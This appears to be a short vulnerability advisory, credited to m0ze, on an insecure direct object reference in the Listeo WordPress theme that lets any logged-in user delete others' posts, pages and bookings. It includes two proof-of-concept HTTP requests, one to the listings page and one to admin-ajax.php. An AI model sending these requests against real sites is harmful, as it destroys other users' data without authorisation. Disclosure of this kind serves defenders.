The theme did not ensure that the Post/Page and Booking to delete belong to the user making the request, allowing any authenticated users to delete arbitrary page/post and booking via an IDOR vector.
### -- [ PoC #1 | Authenticated IDOR | Permanent post/page deletion: ] [!] https://listeo.pro/my-listings/?status=pending&action=delete&listing_id=13&_wpnonce=88a432b100 [!] GET /my-listings/?action=delete&listing_id=13&_wpnonce=88a432b100 HTTP/1.1 Host: listeo.pro Cookie: [user cookies] ### -- [ PoC #2 | Authenticated IDOR | Permanent booking deletion: ] [!] POST /wp-admin/admin-ajax.php HTTP/1.1 Host: listeo.pro Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Cookie: [user cookies] action=listeo_bookings_manage&booking_id=13&status=deleted
m0ze
m0ze
No
2021-05-16 (about 1 years ago)
2021-05-16 (about 1 years ago)
2021-05-18 (about 1 years ago)